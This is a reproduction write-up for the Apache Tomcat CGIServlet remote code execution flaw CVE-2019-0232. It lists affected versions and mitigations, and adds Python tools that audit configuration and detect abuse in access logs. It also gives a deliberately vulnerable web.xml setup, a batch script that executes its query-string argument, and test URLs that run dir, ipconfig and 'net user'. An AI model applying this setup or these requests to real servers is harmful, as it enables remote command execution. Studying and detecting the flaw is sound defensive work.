Apache Tomcat Remote Code Execution Vulnerability Reproduction (CVE-2019-0232)

1. Vulnerability information

CVE ID: CVE-2019-0232

Vulnerability name: CVE-2019-0232, remote code execution through the Tomcat CGI Servlet on Windows

Affected versions:

  • Apache Tomcat 9.0.0.M1 to 9.0.17
  • Apache Tomcat 8.5.0 to 8.5.39
  • Apache Tomcat 7.0.0 to 7.0.93

Description:

  When Apache Tomcat runs on Windows with enableCmdLineArguments enabled, the CGI Servlet is exposed to remote code execution, because of a bug in the way the JRE passes command-line arguments to Windows processes: query-string arguments are handed to the script without the quoting that cmd.exe requires.
  The CGI option enableCmdLineArguments is disabled by default in Tomcat 9.0.x (and, in response to this vulnerability, is now disabled by default in all branches). On 7.0.x and 8.5.x before the fix it defaulted to true, which is why the 8.5.39 configuration below does not set it explicitly. The fix shipped in 7.0.94 and 8.5.40; on the 9.0.x branch it is in 9.0.19 (9.0.18 was never released). Patched releases also add cmdLineArgumentsDecoded / cmdLineArgumentsEncoded init-params that validate each argument against a pattern.

Test platform: Windows

Test environment: Tomcat 8.5.39

2. Vulnerability verification

2.1 Install Tomcat

2.2 Initialize parameters

Edit /apache-tomcat-8.5.39/conf/web.xml. In the stock file the cgi servlet definition and its servlet-mapping are commented out; uncomment both. The executable init-param is left empty so that the .bat script is run directly instead of being handed to the default interpreter (perl). No enableCmdLineArguments init-param is needed here because 8.5.39 defaults it to true; setting it to false (or upgrading) is the mitigation.

    <servlet>
        <servlet-name>cgi</servlet-name>
        <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>cgiPathPrefix</param-name>
            <param-value>WEB-INF/cgi-bin</param-value>
        </init-param>
        <init-param>
            <param-name>executable</param-name>
            <param-value></param-value>
        </init-param>
        <load-on-startup>5</load-on-startup>
    </servlet>
    ......
    <servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
    </servlet-mapping>

Edit /apache-tomcat-8.5.39/conf/context.xml and add privileged="true" to the Context element. This is required because CGIServlet lives in org.apache.catalina.servlets and can only be loaded by a privileged context.

<Context privileged="true">

    <!-- Default set of monitored resources. If one of these changes, the -->
    <!-- web application will be reloaded. -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>
    <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>

    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname="" />
    -->
</Context>
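The two configuration changes above are the whole precondition for the exploit on an affected Windows build: a reachable CGIServlet mapping, a privileged context, and enableCmdLineArguments effectively true. The following audit script is an added example, not code from the original post or from Tomcat; it parses conf/web.xml and conf/context.xml and reports whether that combination is present. It assumes the pre-fix defaults of enableCmdLineArguments (true on 7.0.x and 8.5.x, false on 9.0.x, false on all patched releases), and the two web.xml fragments embedded in it are constructed for the example.

```python
"""Audit Tomcat conf/web.xml and conf/context.xml for the CGIServlet exposure behind CVE-2019-0232.

Added example, not part of the original post. Assumption: when the init-param is absent,
enableCmdLineArguments defaults to true on affected 7.0.x/8.5.x builds and to false otherwise.
"""
import xml.etree.ElementTree as ET

CGI_CLASS = "org.apache.catalina.servlets.CGIServlet"

# Affected ranges as listed in the post: major -> (minor, last affected patch level)
AFFECTED = {7: (0, 93), 8: (5, 39), 9: (0, 17)}


def parse_version(version):
    """'8.5.39' -> (8, 5, 39); '9.0.0.M1' -> (9, 0, 0)."""
    return tuple(int(n) for n in version.split(".")[:3])


def affected_version(version):
    major, minor, patch = parse_version(version)
    rng = AFFECTED.get(major)
    return rng is not None and minor == rng[0] and patch <= rng[1]


def default_enable_cmdline(version):
    """Default of enableCmdLineArguments when the init-param is absent (assumption, see docstring)."""
    return affected_version(version) and parse_version(version)[0] in (7, 8)


def _local(tag):
    """Strip the javaee namespace so matching does not depend on the xmlns URI."""
    return tag.rsplit("}", 1)[-1]


def _children(elem):
    return {_local(c.tag): c for c in elem}


def _text(elem):
    return (elem.text or "").strip() if elem is not None else ""


def cgi_servlet_config(web_xml):
    """Return (names of servlets using CGIServlet, their init-params, whether any is mapped)."""
    root = ET.fromstring(web_xml)
    names, params = set(), {}
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        kids = _children(servlet)
        if _text(kids.get("servlet-class")) != CGI_CLASS:
            continue
        names.add(_text(kids.get("servlet-name")))
        for child in servlet:
            if _local(child.tag) == "init-param":
                p = _children(child)
                params[_text(p.get("param-name"))] = _text(p.get("param-value"))
    mapped = False
    for m in root.iter():
        if _local(m.tag) == "servlet-mapping" and _text(_children(m).get("servlet-name")) in names:
            mapped = True
    return names, params, mapped


def context_privileged(context_xml):
    root = ET.fromstring(context_xml)
    return _local(root.tag) == "Context" and root.get("privileged", "false").lower() == "true"


def audit(web_xml, context_xml, tomcat_version):
    names, params, mapped = cgi_servlet_config(web_xml)
    explicit = params.get("enableCmdLineArguments")
    cmdline = explicit.lower() == "true" if explicit is not None else default_enable_cmdline(tomcat_version)
    result = {
        "cgi_servlet_defined": bool(names),
        "cgi_servlet_mapped": mapped,
        "context_privileged": context_privileged(context_xml),
        "enableCmdLineArguments": cmdline,
        "enableCmdLineArguments_explicit": explicit is not None,
        "affected_version": affected_version(tomcat_version),
    }
    # Only exploitable on Windows, with the servlet reachable and argument passing on an affected build;
    # patched releases additionally validate arguments, so they are not flagged even with explicit true.
    result["exploitable_on_windows"] = (
        result["cgi_servlet_defined"] and mapped and result["context_privileged"]
        and cmdline and result["affected_version"]
    )
    return result


WEB_XML_TEMPLATE = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param><param-name>cgiPathPrefix</param-name><param-value>WEB-INF/cgi-bin</param-value></init-param>
    <init-param><param-name>executable</param-name><param-value></param-value></init-param>
    {extra}
    <load-on-startup>5</load-on-startup>
  </servlet>
  <servlet-mapping><servlet-name>cgi</servlet-name><url-pattern>/cgi-bin/*</url-pattern></servlet-mapping>
</web-app>"""

# Constructed: the post's configuration, relying on the 8.5.39 default enableCmdLineArguments=true.
VULNERABLE_WEB_XML = WEB_XML_TEMPLATE.format(extra="")
# Constructed: the same file with argument passing switched off explicitly (the mitigation).
HARDENED_WEB_XML = WEB_XML_TEMPLATE.format(
    extra="<init-param><param-name>enableCmdLineArguments</param-name><param-value>false</param-value></init-param>"
)
PRIVILEGED_CONTEXT_XML = '<Context privileged="true"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>'

if __name__ == "__main__":
    for label, xml in (("post config", VULNERABLE_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(label, audit(xml, PRIVILEGED_CONTEXT_XML, "8.5.39"))
```

Run it against a real install by reading conf/web.xml and conf/context.xml from disk and passing the version from the Tomcat version banner; the 9.0.x case shows why the same web.xml is not exploitable there unless enableCmdLineArguments is set to true by hand.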

2.3 Write the test script

Create a cgi-bin directory under /apache-tomcat-8.5.39/webapps/ROOT/WEB-INF (matching the cgiPathPrefix above) and create hello.bat in it. Note that this script deliberately runs its first argument as a command, so it demonstrates that query-string arguments reach the script; it does not depend on the argument-quoting bug itself.

@echo off
rem Minimal CGI response: header line, blank line, then the body.
echo Content-Type: text/plain
echo.
rem %~1 is the first command-line argument with surrounding quotes stripped;
rem the script then executes it, so whatever arrives from the query string runs.
set foo=%~1
%foo%

3. Successful reproduction

Each request below passes its query string to hello.bat as the first argument; the command output is returned in the response body:

http://localhost:8080/cgi-bin/hello.bat?dir

http://localhost:8080/cgi-bin/hello.bat?C:/Windows/System32/ipconfig

http://localhost:8080/cgi-bin/hello.bat?C:/Windows/System32/net%20user
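Requests like the three above leave a distinctive trace in the Tomcat access log. The detector below is an added example, not code from the original post; it assumes the AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b) and the /cgi-bin/*.bat mapping used above. Following RFC 3875 section 4.4, it treats the query string as command-line arguments only when it contains no '=', splits it on '+', URL-decodes each argument and flags cmd.exe metacharacters, System32 paths and common recon commands. The log lines embedded in it are constructed for the example and mirror the post's test URLs.

```python
"""Detect CGIServlet argument abuse (CVE-2019-0232 style) in Tomcat access logs.

Added example, not part of the original post. Assumes the AccessLogValve "common"
pattern; the sample log lines are constructed for this example.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Scripts under the /cgi-bin/* mapping from the post; widen if cgi-bin is mapped elsewhere.
CGI_PATH_RE = re.compile(r'^/cgi-bin/[^?]*\.(bat|cmd)$', re.IGNORECASE)

# Heuristics applied to each decoded argument.
ARG_CHECKS = [
    (re.compile(r'[&|^<>]'), "cmd.exe metacharacter"),
    (re.compile(r'system32', re.IGNORECASE), "path into System32"),
    (re.compile(r'^(dir|net|ipconfig|whoami|cmd|powershell|certutil)(\.exe)?(\s|$)', re.IGNORECASE),
     "recon/execution command as argument"),
]


def cgi_arguments(query):
    """RFC 3875 4.4: the query string becomes command-line arguments only if it has no '='."""
    if not query or "=" in query:
        return []
    return [unquote(a) for a in query.split("+") if a]


def inspect_request(target):
    """Return the reasons a request target looks like CGI argument abuse (empty list if clean)."""
    path, _, query = target.partition("?")
    if not CGI_PATH_RE.match(path):
        return []
    reasons = []
    for arg in cgi_arguments(query):
        for pattern, why in ARG_CHECKS:
            if pattern.search(arg):
                reasons.append(f"{why}: {arg!r}")
    return reasons


def find_cgi_abuse(log_text):
    """Parse access-log lines and return one hit per suspicious request, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not in the expected format: skip rather than guess
        reasons = inspect_request(m["target"])
        if reasons:
            hits.append({"host": m["host"], "time": m["time"], "target": m["target"],
                         "status": m["status"], "reasons": reasons})
    return hits


# Constructed sample log: the post's three test requests, one metacharacter variant, and benign traffic.
SAMPLE_LOG = """\
127.0.0.1 - - [09/Apr/2019:14:03:11 +0800] "GET /cgi-bin/hello.bat?dir HTTP/1.1" 200 812
127.0.0.1 - - [09/Apr/2019:14:03:25 +0800] "GET /cgi-bin/hello.bat?C:/Windows/System32/ipconfig HTTP/1.1" 200 1490
127.0.0.1 - - [09/Apr/2019:14:03:40 +0800] "GET /cgi-bin/hello.bat?C:/Windows/System32/net%20user HTTP/1.1" 200 611
127.0.0.1 - - [09/Apr/2019:14:04:02 +0800] "GET /cgi-bin/hello.bat?%26dir HTTP/1.1" 200 812
127.0.0.1 - - [09/Apr/2019:14:05:00 +0800] "GET /cgi-bin/hello.bat?name=alice HTTP/1.1" 200 30
127.0.0.1 - - [09/Apr/2019:14:05:10 +0800] "GET /cgi-bin/hello.bat HTTP/1.1" 200 30
127.0.0.1 - - [09/Apr/2019:14:05:20 +0800] "GET /index.jsp HTTP/1.1" 200 1200
this line is not an access-log record
"""

if __name__ == "__main__":
    for hit in find_cgi_abuse(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["target"], hit["reasons"])
```

The '=' rule matters for tuning: a query such as name=alice is a normal CGI form request and is never turned into arguments by the servlet, so it is not flagged, while the same script called with ?dir is. Feed the function the contents of logs/localhost_access_log.*.txt to run it against a real install.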

4. References